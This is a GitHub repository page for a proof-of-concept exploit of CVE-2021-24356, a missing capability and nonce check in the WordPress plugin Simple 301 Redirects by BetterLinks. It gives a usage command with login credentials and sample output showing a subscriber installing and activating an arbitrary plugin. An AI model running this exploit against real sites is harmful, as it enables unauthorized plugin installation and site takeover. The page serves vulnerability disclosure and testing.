Skip to content
/ CVE-2021-24356 Public

Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber + Arbitrary Plugin Installation

License

GPL-3.0 license
0 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

RandomRobbieBF/CVE-2021-24356

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
CVE-2021-24356.py
CVE-2021-24356.py
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2021-24356

Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber + Arbitrary Plugin Installation

Description

A lack of capability checks and insufficient nonce check on the AJAX action in the plugin, made it possible for authenticated users to install arbitrary plugins on vulnerable sites.

How to use

$ python3 CVE-2021-24356.py --url http://wordpress.lan --username user --password useruser1 --slug betterlinks
Getting REST API Nonce!
Nonce Found: dd72f43027
Installing Plugin!
{"success":true,"data":"Plugin is installed successfully!"}
Activating Plugin!
{"success":true,"data":"BetterLinks is activated!"}

Note: Some plugins might not activate if not you need to change sluga variable to the path/file.php that is the main file for the plugin currently works really well when the slug is something like betterlinks and the main file of the plugin is called betterlinks.php

About

Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber + Arbitrary Plugin Installation

Topics

wordpress-plugin wordpress-exploit cve-2021-24356

Resources

Readme

License

GPL-3.0 license
Activity

Stars

0 stars

Watchers

2 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages